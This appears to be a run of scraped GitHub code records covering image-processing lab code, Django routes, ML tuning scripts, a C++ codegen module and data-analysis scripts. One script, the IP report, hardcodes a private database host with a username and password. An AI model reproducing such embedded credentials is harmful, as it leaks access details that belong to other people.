new_width, new_height = width*ratio, height*ratio\n res_image = np.zeros((new_height, new_width))\n res_image[0:new_height:ratio, 0:new_width:ratio] = image\n return res_image\n\n\ndef cs4243_gauss_pyramid(image, n=3):\n \"\"\"\n 10 points\n build a Gaussian Pyramid of level n\n :param image: original grey scaled image\n :param n: level of pyramid\n :return pyramid: list, with list[0] corresponding to original image.\n\t:e.g., img0->blur&downsample->img1->blur&downsample->img2\t\n Tips: you may need to call cs4243_gaussian_kernel() and cs4243_filter_faster()\n\tThe kernel for blur is given, do not change it.\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n \n # ============= Your code here ============= #\n pyramid.append(image)\n for i in range(n):\n temp_image = cs4243_filter_faster(pyramid[i], kernel)\n temp_image = cs4243_downsample(temp_image, 2)\n pyramid.append(temp_image)\n # ========================================= #\n \n return pyramid\n\ndef cs4243_lap_pyramid(gauss_pyramid):\n \"\"\"\n 10 points\n build a Laplacian Pyramid from the corresponding Gaussian Pyramid\n :param gauss_pyramid: list, results of cs4243_gauss_pyramid\n :return lap_pyramid: list, with list[0] corresponding to image at level n-1 in Gaussian Pyramid.\n\tTips: The kernel for blurring during upsampling is given, you need to scale its value following the standard pipeline in laplacian pyramid.\n \"\"\"\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n \n # ============= Your code here ============= #\n kernel = kernel * 4.0\n\n for i in reversed(range(n-1)):\n curr_lvl = gauss_pyramid[i+1]\n curr_lvl = cs4243_upsample(curr_lvl, 2)\n curr_lvl = cs4243_filter_faster(curr_lvl, kernel)\n\n prev_lvl = gauss_pyramid[i]\n lap_pyramid.append(prev_lvl - curr_lvl)\n # ========================================= #\n \n return lap_pyramid\n \ndef cs4243_Lap_blend(A, B, 
mask):\n \"\"\"\n 10 points\n blend image with Laplacian pyramid\n :param A: image on the left\n :param B: image on the right\n :param mask: mask [0, 1]\n :return blended_image: same size as input image\n Tips: use cs4243_gauss_pyramid() & cs4243_lap_pyramid() to help you\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n blended_image = None\n \n # ============= Your code here ============= #\n def reconstruct_lap_pyramid(lap_pyramid, kernel):\n # Scale kernel to compensate the 0s in the image after upsampling\n kernel = kernel * 4.0\n image = lap_pyramid[0]\n for i in range(1, len(lap_pyramid)):\n temp_image = cs4243_upsample(image, 2)\n temp_image = cs4243_filter_faster(temp_image, kernel)\n image = temp_image + lap_pyramid[i]\n return image\n \n la = cs4243_lap_pyramid(cs4243_gauss_pyramid(A))\n lb = cs4243_lap_pyramid(cs4243_gauss_pyramid(B))\n gr = list(reversed(cs4243_gauss_pyramid(mask)))\n \n lap_blended = []\n for a, b, ra in zip(la, lb, gr):\n blended = ra * a + (1.0 - ra) * b\n lap_blended.append(blended)\n\n blended_image = reconstruct_lap_pyramid(lap_blended, kernel)\n # ========================================= #\n \n return blended_image","repo_name":"alloystory/cs4243","sub_path":"Lab 1/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":16354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
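The transform.py record above speeds up 2D convolution by flattening every kernel-sized patch into one row and doing a single matrix product (the cs4243_filter_faster idea). A minimal, self-contained NumPy sketch of that im2col trick, with illustrative names that are not taken from the repo:

import numpy as np

def conv2d_im2col(image, kernel):
    # Zero-pad so the output keeps the input's spatial size.
    Hi, Wi = image.shape
    Hk, Wk = kernel.shape
    padded = np.pad(image, ((Hk // 2, Hk // 2), (Wk // 2, Wk // 2)), mode="constant")
    # Gather every Hk x Wk patch as one row of a (Hi*Wi, Hk*Wk) matrix.
    patches = np.empty((Hi * Wi, Hk * Wk))
    for i in range(Hi):
        for j in range(Wi):
            patches[i * Wi + j] = padded[i:i + Hk, j:j + Wk].ravel()
    # True convolution flips the kernel; one matmul then filters every pixel at once.
    return (patches @ np.flip(kernel).ravel()).reshape(Hi, Wi)

img = np.arange(25, dtype=float).reshape(5, 5)
box = np.ones((3, 3)) / 9.0
smoothed = conv2d_im2col(img, box)  # same shape as img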
+{"seq_id":"36802052724","text":"\"\"\"day24_myself URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom app01 import views\n\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^index/$', views.index),\n url(r'^login/$', views.login),\n url(r'^reg/$', views.reg),\n url(r'^logout_v/$', views.logout_v),\n url(r'^admin/', admin.site.urls),\n\n url(r'^hosts/$', views.hosts),\n url(r'^hosts/add/$', views.hosts_add),\n url(r'^hosts/edit/(\\d+)/$', views.edit_host),\n url(r'^hosts/del/(\\d+)/$', views.delete_host),\n\n url(r'^users/$', views.users),\n url(r'^users/add/$', views.users_add),\n url(r'^users/del/(\\d+)/$', views.users_del),\n url(r'^users/edit/(\\d+)/$', views.users_edit),\n\n url(r'^test/$', views.test),\n]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shengleqi/day24_myself","sub_path":"day24_myself/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
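The urls.py record above uses Django 1.11-style url() patterns, where unnamed regex groups such as (\d+) are passed to the view positionally. A hedged sketch of what one matching view could look like (hypothetical template and argument names; the real views live in app01.views and are not shown in the record):

from django.shortcuts import render

def edit_host(request, host_id):
    # host_id arrives as the string captured by (\d+) in ^hosts/edit/(\d+)/$
    return render(request, "edit_host.html", {"host_id": host_id})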
+{"seq_id":"35645939138","text":"# -*- coding: utf-8 -*-\nfrom os.path import splitext\nimport argparse\nimport yaml\nimport json\nfrom tabular.tabular import Tabular, MarkdownTabular, AsciiDocTabular\n\n\ndef set_config(args):\n tabular_cls = Tabular\n file_name = args.yml_file\n name, ext = splitext(file_name)\n out_ext = '.txt'\n if args.markdown:\n tabular_cls = MarkdownTabular\n out_ext = '.md'\n if args.asciidoc:\n tabular_cls = AsciiDocTabular\n out_ext = '.adoc'\n if args.csv:\n tabular_cls = Tabular\n out_ext = '.csv'\n\n file_parser = yaml\n if args.json or ext == 'json':\n file_parser = json\n output = args.output\n if not output:\n output = name + out_ext\n table_name = args.tablename\n if not table_name:\n table_name = name\n return file_name, file_parser, tabular_cls, output, table_name\n\n\ndef run(args):\n file_name, file_parser, tabular_cls, output, table_name = set_config(args)\n with open(file_name, 'r') as yml_file:\n data = file_parser.load(yml_file)\n t = tabular_cls.from_dict(data, table_name=table_name)\n result = t.render()\n with open(output, 'w') as out:\n out.write(result)\n print('output into {}'.format(output))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='convert yaml file into tabular text(csv, markdown, AsciiDoc)')\n parser.add_argument('yml_file', help='target yaml file to convert')\n parser.add_argument('-o', '--output',\n help='output file name. If no designation, replace file extension following table style')\n parser.add_argument('-t', '--tablename', help='set table name (default: file name base)')\n parser.add_argument('-j', '--json', action='store_true', default=0, help='json file convert mode')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-md', '--markdown', action='store_true', default=1, help='as markdown style')\n group.add_argument('-ad', '--asciidoc', action='store_true', default=0, help='as AsciiDoc style')\n group.add_argument('--csv', action='store_true', default=0, help='as csv style')\n\n run(parser.parse_args())","repo_name":"ta-dadadada/yamltotable","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
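run.py above selects the output style via mutually exclusive argparse flags. A hedged usage sketch with hypothetical file names (the flags come from the record's own argparse definitions); note that splitext() returns the extension with its leading dot, so the ext == 'json' comparison in set_config never matches and JSON input always needs the explicit -j flag:

# Convert a YAML file to a Markdown table (the default style), naming the output explicitly:
#   python run.py services.yml -o services.md -t services
# Convert a JSON file to CSV (-j is required, per the note above):
#   python run.py metrics.json -j --csv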
+{"seq_id":"4847090800","text":"import os\nfrom typing import List\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\nPATH_ROOT = os.path.dirname(__file__)\n\n\ndef _load_requirements(path_dir: str, file_name: str) -> List[str]:\n with open(os.path.join(path_dir, file_name), \"r\") as file:\n lines = [ln.strip() for ln in file.readlines()]\n reqs = list()\n for line in lines:\n if line.startswith(\"#\"):\n continue\n else:\n reqs.append(line)\n return reqs\n\n\nsetup(\n name=\"washing-learning\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n author=\"Lucas Robinet\",\n author_email=\"lucas.robinet@yahoo.com\",\n description=\"Machine Learning Toolbox\",\n long_description=open(\"README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Lucas-rbnt/washing-learning\",\n license=\"Apache-2.0\",\n packages=find_packages(exclude=[\"examples\", \"examples.*\", \"tests\", \"tests.*\"]),\n install_requires=_load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements.txt\"\n ),\n extras_requires={\n \"dev\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-dev.txt\"\n ),\n \"doc\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-doc.txt\"\n ),\n },\n)\n","repo_name":"Lucas-rbnt/washing-learning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17815524265","text":"import turtle\n\ndef draw_shapes():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n # Turn Brad right 90 degrees and move forward x 4\n for i in range(4):\n brad.forward(100)\n brad.right(90)\n\n # Add another turtle named angie\n angie = turtle.Turtle()\n\n # Customize angie\n angie.shape(name='arrow')\n angie.color('blue')\n\n # angie, draw a circle\n angie.circle(100)\n\n # Add the third turtle named charles\n charles = turtle.Turtle()\n\n # Customize charles\n charles.shape(name='turtle')\n charles.color('green')\n\n # charles, draw a triangle\n for i in range(3):\n charles.back(100)\n charles.right(120)\n\n window.exitonclick()\n\ndraw_shapes()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/11_improving_code_quality.py","file_name":"11_improving_code_quality.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8580705846","text":"\ndef isPandigital(n):\n return set(str(n)) == set('0123456789')\n\ndef solve(n):\n count = 0\n def _solve(x, d, m):\n nonlocal count\n if m == 0:\n if isPandigital(x):\n count += 1\n else:\n if d == 0:\n _solve(10*x + 1, 1, m-1)\n elif d == 9:\n _solve(10*x + 8, 8, m-1)\n else:\n _solve(10*x + d-1, d-1, m-1)\n _solve(10*x + d+1, d+1, m-1)\n for i in range(1, 10):\n _solve(i, i, n-1)\n return count\n\nfor i in range(10, 25):\n print('i=' + str(i) + ', ' + str(solve(i)))\n \n","repo_name":"tyama711/competitive","sub_path":"ProjectEuler/Problem178/p178.py","file_name":"p178.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
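The p178.py record enumerates step numbers recursively and only tests pandigitality at the leaves, which grows quickly with the digit count. A hedged alternative sketch (not from the repo) that counts the same quantity with dynamic programming over (last digit, digit-set bitmask):

def solve_dp(n):
    # dp[(d, mask)] = number of length-so-far step numbers ending in digit d whose
    # digit set is exactly `mask` (bit i set <=> digit i has appeared)
    dp = {(d, 1 << d): 1 for d in range(1, 10)}  # a leading zero is not allowed
    for _ in range(n - 1):
        ndp = {}
        for (d, mask), cnt in dp.items():
            for nd in (d - 1, d + 1):            # adjacent digits differ by one
                if 0 <= nd <= 9:
                    key = (nd, mask | (1 << nd))
                    ndp[key] = ndp.get(key, 0) + cnt
        dp = ndp
    full = (1 << 10) - 1                         # all ten digits used => pandigital
    return sum(cnt for (_, mask), cnt in dp.items() if mask == full)

# solve_dp(i) should agree with solve(i) from the record for each i in range(10, 25).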
+{"seq_id":"14817029693","text":"import cv2\nimport numpy as np\n\n\ndef nichika(img, th=128):\n ind0 = np.where(img < th)\n ind1 = np.where(img >= th)\n img[ind0] = 0\n img[ind1] = 1\n\n return img\n\ndef Renketsu(img):\n Ver, Hor = img.shape\n img = np.pad(img, ([1, 1], [1, 1]), 'edge')\n result = np.zeros((Ver+1, Hor+1, 3))\n\n for x in range(1, Hor+1):\n for y in range(1, Ver+1):\n if img[y, x] != 0:\n s1 = img[y, x+1] - (img[y, x+1] * img[y-1, x+1] * img[y-1, x])\n s2 = img[y-1, x] - (img[y-1, x] * img[y-1, x-1] * img[y, x-1])\n s3 = img[y, x-1] - (img[y, x-1] * img[y+1, x-1] * img[y+1, x])\n s4 = img[y+1, x] - (img[y+1, x] * img[y+1, x+1] * img[y, x+1])\n S = s1 + s2 + s3 + s4\n\n if S == 0:\n result[y,x] = [0, 0, 255]\n elif S == 1:\n result[y,x] = [0, 255, 0]\n elif S == 2:\n result[y,x] = [255, 0, 0]\n elif S == 3:\n result[y,x] = [255, 255, 0]\n elif S == 4:\n result[y,x] = [255, 0, 255]\n\n return result[1:1+Ver, 1:1+Hor]\n\n\nimg = cv2.imread(\"../renketsu.png\", cv2.IMREAD_GRAYSCALE)\nimg = nichika(img, 1)\nresult = Renketsu(img)\n\ncv2.imwrite(\"myans_61.png\", result)\ncv2.imshow(\"result\", result)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_61_70/myanswers/myans61.py","file_name":"myans61.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
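The myans61.py record colour-codes each foreground pixel by its 4-connectivity number S. A tiny self-contained check of the same four-term formula on a single 3x3 patch, which may make the indexing easier to follow (illustrative names, not from the repo):

import numpy as np

def connectivity_number(p):
    # p is a 3x3 binary patch with the pixel of interest at p[1, 1];
    # the four terms mirror s1..s4 in Renketsu above (right, up, left, down).
    s1 = p[1, 2] - p[1, 2] * p[0, 2] * p[0, 1]
    s2 = p[0, 1] - p[0, 1] * p[0, 0] * p[1, 0]
    s3 = p[1, 0] - p[1, 0] * p[2, 0] * p[2, 1]
    s4 = p[2, 1] - p[2, 1] * p[2, 2] * p[1, 2]
    return s1 + s2 + s3 + s4

patch = np.array([[0, 1, 0],
                  [0, 1, 1],
                  [0, 0, 0]])
print(connectivity_number(patch))  # prints 2, matching the S == 2 branch in Renketsu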
+{"seq_id":"28143295175","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom sklearn.grid_search import GridSearchCV\nimport time\n\nt_start = time.time()\n\nX_train = pd.read_csv(\"X_train.csv\").drop(columns=[\"Unnamed: 0\",\"index\"], axis=1)\ny_train = pd.read_csv(\"y_train.csv\").drop(columns=[\"Unnamed: 0\",\"id\"], axis=1).target.values\n\n\nparameters = {'min_child_weight': [5, 10],\n 'gamma': [0.01, .1,1],\n 'subsample': [0.8,1],\n 'colsample_bytree': [0.6, 0.8],\n 'max_depth': [3, 5, 7]\n }\n\nparameters = {'learning_rate':[0.02],\n 'min_child_weight': [5],\n 'gamma': [30],\n 'subsample': [0.6],\n 'colsample_bytree': [0.6],\n 'max_depth': [6],\n 'n_estimators':[1000]\n }\n\n\n\nxgbc = XGBClassifier(objective='binary:logistic',\n silent=True, verbose=True, scale_pos_weight=8)# 'scale_pos_weight' to set as the ratio for skewed data\n\nclf_xgbc=GridSearchCV(estimator=xgbc,param_grid=parameters, scoring='roc_auc', cv=3, n_jobs=1,verbose=100)\n\nclf_xgbc.fit(X_train, y_train)\n\n\nprint(\"Best parameters are {}\".format(clf_xgbc.best_params_))\nprint(\"Best score is {}\".format(clf_xgbc.best_score_))\n\n\nt_end = time.time()\nprint(\"It took {} seconds to run this test\".format(t_end-t_start))","repo_name":"amnghd/Uber_Driver_Prediction_Challenge","sub_path":"utility functions/xgboost_hypertunner.py","file_name":"xgboost_hypertunner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
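The xgboost_hypertunner.py record imports GridSearchCV from sklearn.grid_search, a module that was removed in later scikit-learn releases. A hedged sketch of the equivalent setup on a current install (same objective and class-weight settings as the record, smaller parameter grid for brevity):

from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier

xgbc = XGBClassifier(objective="binary:logistic", scale_pos_weight=8)
clf_xgbc = GridSearchCV(estimator=xgbc,
                        param_grid={"learning_rate": [0.02], "max_depth": [6],
                                    "n_estimators": [1000]},
                        scoring="roc_auc", cv=3, n_jobs=1, verbose=100)
# clf_xgbc.fit(X_train, y_train) then proceeds exactly as in the record.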
+{"seq_id":"5838842647","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Geometry.MuonCommonData.muonIdealGeometryXML_cfi\")\nprocess.load(\"Geometry.RPCGeometry.rpcGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/tmp/carrillo/kktau300GeVx1000WithRPC.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('TrackRPC',\n tracks = cms.untracked.string('standAloneMuons'),\n partLabel = cms.untracked.string(\"genParticles\"),\n rootFileName = cms.untracked.string('/tmp/carrillo/hscp.root'),\n\n)\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"camilocarrillo/UserCode","sub_path":"TrackRPC/trackrpc_cfg.py","file_name":"trackrpc_cfg.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19819878240","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom ..codegen import Codegen, SIGNED_SOURCE\nfrom ..types import DynamicArrayType\nfrom .type_converter import TypeConverter\n\n\nclass CppEntryStructsCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.h\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n#include \n#include \n\n#pragma once\n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_STRUCTS%%\n\nuint8_t peek_type(const void* src, size_t len);\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n enum = self._generate_entries_structs()\n template = template.replace(\"%%ENTRIES_STRUCTS%%\", enum)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_structs(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\nstruct __attribute__((packed)) %%TYPENAME%% {\n\n static const uint8_t kSerializationType = %%TYPE_ID%%;\n\n%%FIELDS%%\n\n static void pack(const %%TYPENAME%%& entry, void* dst, size_t size);\n static void unpack(%%TYPENAME%%& entry, const void* src, size_t size);\n\n static size_t calculateSize(%%TYPENAME%% const& entry);\n};\n\"\"\".lstrip()\n\n fields = [\n TypeConverter.get(field[1]).generate_declaration(name=field[0])\n for field in fmt.fields\n ]\n fields = \"\\n\".join(fields)\n fields = Codegen.indent(fields)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%TYPE_ID%%\", str(fmt.type_id))\n template = template.replace(\"%%FIELDS%%\", fields)\n\n return template\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n\n\nclass CppEntryStructsCppCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCppCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.cpp\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_CODE%%\n\nuint8_t peek_type(const void* src, size_t len) {\n const uint8_t* src_byte = reinterpret_cast(src);\n return *src_byte;\n}\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n code = self._generate_entries_code()\n template = template.replace(\"%%ENTRIES_CODE%%\", code)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_code(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\n%%PACKCODE%%\n\n%%UNPACKCODE%%\n\n%%CALCULATESIZECODE%%\n\"\"\".lstrip()\n\n pack_code = self._generate_pack_code(fmt)\n unpack_code = self._generate_unpack_code(fmt)\n calcsize_code = 
self._generate_calcsize_code(fmt)\n\n template = template.replace(\"%%PACKCODE%%\", pack_code)\n template = template.replace(\"%%UNPACKCODE%%\", unpack_code)\n template = template.replace(\"%%CALCULATESIZECODE%%\", calcsize_code)\n\n return template\n\n def _generate_pack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: dst must be 4-byte aligned. */\nvoid %%TYPENAME%%::pack(const %%TYPENAME%%& entry, void* dst, size_t size) {\n if (size < %%TYPENAME%%::calculateSize(entry)) {\n throw std::out_of_range(\"Cannot fit %%TYPENAME%% in destination\");\n }\n if (dst == nullptr) {\n throw std::invalid_argument(\"dst == nullptr\");\n }\n uint8_t* dst_byte = reinterpret_cast(dst);\n *dst_byte = kSerializationType;\n size_t offset = 1;\n\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for idx, (name, ftype) in enumerate(fmt.fields):\n\n if isinstance(ftype, DynamicArrayType) and idx != len(fmt.fields) - 1:\n # HACK: figure out how to propagate dynamic offsets in the\n # packing/unpacking code\n raise ValueError(\n \"DynamicArrayType entries are only allowed\" \" as the last member\"\n )\n\n memcpy = TypeConverter.get(ftype).generate_pack_code(\n from_expression=\"entry.{name}\".format(name=name),\n to_expression=\"dst_byte\",\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_unpack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: src must be 4-byte aligned. */\nvoid %%TYPENAME%%::unpack(%%TYPENAME%%& entry, const void* src, size_t size) {\n if (src == nullptr) {\n throw std::invalid_argument(\"src == nullptr\");\n }\n const uint8_t* src_byte = reinterpret_cast(src);\n if (*src_byte != kSerializationType) {\n throw std::invalid_argument(\"Serialization type is incorrect\");\n }\n size_t offset = 1;\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for name, ftype in fmt.fields:\n memcpy = TypeConverter.get(ftype).generate_unpack_code(\n from_expression=\"src_byte\",\n to_expression=\"entry.{name}\".format(name=name),\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_calcsize_code(self, fmt):\n template = \"\"\"\nsize_t %%TYPENAME%%::calculateSize(%%TYPENAME%% const& entry) {\n size_t offset = 1 /*serialization format*/;\n%%EXPRESSIONS%%\n return offset;\n}\n\"\"\".lstrip()\n\n expressions = [\n TypeConverter.get(ftype).generate_runtime_size_code(\n \"entry\",\n fname,\n \"offset\",\n )\n for fname, ftype in fmt.fields\n ]\n expressions = \"\\n\".join(expressions)\n expressions = Codegen.indent(expressions)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%EXPRESSIONS%%\", expressions)\n return template\n","repo_name":"facebookarchive/profilo","sub_path":"cpp/codegen/cpp/entry_structs.py","file_name":"entry_structs.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":1576,"dataset":"github-code","pt":"53"}
+{"seq_id":"23079345856","text":"import pymysql\nfrom datetime import datetime\nfrom collections import defaultdict\n\nsql_dict = {\n 'host': '10.10.180.145',\n 'user': 'hourong',\n 'password': 'hourong',\n 'charset': 'utf8',\n 'db': 'IP'\n}\n\ncount_dict = defaultdict(list)\nint_split = 30\nif __name__ == '__main__':\n _count = 0\n conn = pymysql.connect(**sql_dict)\n with conn as cursor:\n # IP\n # cursor.execute('''SELECT\n # ip_address,\n # group_concat(u_time ORDER by u_time)\n # FROM ip_used\n # GROUP BY ip_address''')\n # local proxy\n cursor.execute('''SELECT\n local_proxy,\n group_concat(u_time ORDER by u_time)\n FROM ip_used\n GROUP BY local_proxy''')\n for line in cursor.fetchall():\n _count += 1\n if _count % 10000 == 0:\n print(_count)\n ip, times = line\n time_list = times.decode().split(',')\n if len(time_list) == 1:\n count_dict[-1].append(ip)\n\n else:\n for i in range(len(time_list) - 1):\n try:\n last = datetime.strptime(time_list[i + 1], '%Y-%m-%d %X')\n first = datetime.strptime(time_list[i], '%Y-%m-%d %X')\n except Exception:\n continue\n\n res = (last - first).seconds // 60\n\n count_dict[res // int_split].append(ip)\n\n # print(count_dict)\n x_data = []\n y_data = []\n for k in sorted(count_dict.keys()):\n v = count_dict[k]\n if k == -1:\n print('1 times', len(v))\n x_data.append('一次')\n y_data.append(len(v))\n else:\n print(str(30 * k) + ' - ' + str(30 + 30 * k), len(v))\n x_data.append(str(30 * k) + ' - ' + str(30 + 30 * k))\n y_data.append(len(v))\n conn.close()\n print(x_data)\n print(y_data)\n","repo_name":"20113261/p_m","sub_path":"IP_report/ip_report.py","file_name":"ip_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4237528731","text":"#################### Select news sources #################### \nimport pandas as pd \nimport numpy as np\nimport os\n\ndata_preparation_path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(data_preparation_path)\n\nlabels = pd.read_csv('labels.csv')\n\nlabels.rename(columns={'Unnamed: 0': 'Source'}, inplace=True)\n\n# Removing German articles of Spiegel\nlabels.drop(index=np.array(labels.index)[labels['Source']=='Spiegel'], inplace=True)\nlabels.reset_index(drop=True, inplace=True)\n\n\nunwanted_columns = ['NewsGuard, Does not repeatedly publish false content',\n 'NewsGuard, Gathers and presents information responsibly',\n 'NewsGuard, Regularly corrects or clarifies errors',\n 'NewsGuard, Handles the difference between news and opinion responsibly',\n 'NewsGuard, Avoids deceptive headlines',\n 'NewsGuard, Website discloses ownership and financing',\n 'NewsGuard, Clearly labels advertising',\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of interest\",\n 'NewsGuard, Provides information about content creators',\n 'NewsGuard, score',\n 'NewsGuard, overall_class',\n 'Pew Research Center, known_by_40%',\n 'Pew Research Center, total',\n 'Pew Research Center, consistently_liberal',\n 'Pew Research Center, mostly_liberal',\n 'Pew Research Center, mixed',\n 'Pew Research Center, mostly conservative',\n 'Pew Research Center, consistently conservative',\n 'Wikipedia, is_fake',\n 'Open Sources, reliable',\n 'Open Sources, fake',\n 'Open Sources, unreliable',\n 'Open Sources, bias',\n 'Open Sources, conspiracy',\n 'Open Sources, hate',\n 'Open Sources, junksci',\n 'Open Sources, rumor',\n 'Open Sources, blog',\n 'Open Sources, clickbait',\n 'Open Sources, political',\n 'Open Sources, satire',\n 'Open Sources, state',\n 'PolitiFact, Pants on Fire!',\n 'PolitiFact, False',\n 'PolitiFact, Mostly False',\n 'PolitiFact, Half-True',\n 'PolitiFact, Mostly True',\n 'PolitiFact, True']\n# 'BuzzFeed, leaning'\nlabels_wanted = labels.drop(unwanted_columns, axis=1)\n\n# buzzfeed news source count\nnum_buzzfeed_outlets = np.invert(pd.isna(labels_wanted['BuzzFeed, leaning'])).sum()\n\n##### Allsides Dataset (chosen) ###############################################\n\n# labeled lean left\nallsides_lean_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Left'])\n# labeled lean right\nallsides_lean_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Right'])\n# labeled: center\nallsides_center = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Center'])\n# labeled: right\nallsides_right = 